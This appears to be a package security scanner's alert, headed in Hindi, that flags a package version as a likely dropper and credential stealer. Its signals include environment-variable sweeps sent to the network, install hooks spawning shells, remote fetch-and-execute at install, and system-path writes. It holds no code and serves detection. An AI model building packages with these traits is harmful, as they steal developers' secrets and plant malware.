सुरक्षा अलर्ट

Newly-introduced runtime execution surface (eval / shell / network) on a package published inside a coordinated burst of uninspectable ballooned bundles by the same maintainer account - stage-1 dropper precursor, failing closed

Newly-introduced runtime execution surface (eval / shell / network) on a package published inside a coordinated burst of uninspectable ballooned bundles by the same maintainer account - stage-1 dropper precursor, failing closed

• Dynamic eval + network access BOTH appeared in this version — hijack shape (payload-introduction signature; neither cap was present in the trust-anchor baseline)
• Dynamic code evaluation with network access — potential code injection or exfiltration

Bulk env-var sweep + shell exec at runtime — credential-stealer

• A dist-tag (e.g. latest) was moved to this version while it was less than 1 hour old — publish-side compromise indicator
• Manifest version doesn't match any embedded version constant in the bundle — bundle may not have been rebuilt from the published manifest; review release pipeline and corroborating signals
• Obfuscated shell execution — concealment pattern

Install-time payload delivery: remote fetch + execution during install

• matched: verdict_payload_delivery_and_execution, verdict_suspicious_install_download_source, verdict_runtime_payload_delivery, verdict_suspicious_install_time_execution

Install-time suspicious download: evidence contains raw IP, tunnel service, or paste site URL

• matched: verdict_suspicious_install_download_source, verdict_runtime_payload_delivery

Payload delivery from suspicious source: IOC URL + execution capability

• Install hook spawns dynamic / forked-detached shell — dropper attribution
• Manifest version doesn't match any embedded version constant in the bundle — bundle may not have been rebuilt from the published manifest; review release pipeline and corroborating signals
• Install hook + shell exec + network — dropper shape (scopes may be install or runtime; install hook can transitively reach runtime caps via the postinstall entrypoint)

Suspicious install-time execution: 2+ suspicious signals during install

• CLI bin entry points at the same file as a lifecycle script (preinstall/install/postinstall/prepare) — [email protected] dual-trigger
• Bulk env-var sweep + shell exec at runtime — credential-stealer
• Bulk env-var sweep (cap-bulk-env-access reads ALL of process.env) + outbound network — credential-stealer
• Install hook spawns dynamic / forked-detached shell — dropper attribution
• Install hook writes to system paths (/etc/, /usr/, etc.) — review for persistence

Newly-introduced runtime execution surface (eval / shell / network) on a package published inside a coordinated burst of uninspectable ballooned bundles by the same maintainer account - stage-1 dropper precursor, failing closed

Bulk env-var sweep + shell exec at runtime — credential-stealer

• Bulk env-var sweep (cap-bulk-env-access reads ALL of process.env) + outbound network — credential-stealer